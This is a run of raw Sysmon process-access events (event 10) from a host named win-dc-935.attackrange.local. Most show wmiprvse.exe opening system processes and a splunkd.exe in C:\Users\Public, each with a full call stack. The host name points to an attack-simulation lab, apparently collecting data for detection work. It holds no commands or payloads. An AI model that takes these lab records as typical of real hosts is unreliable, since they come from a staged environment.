13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 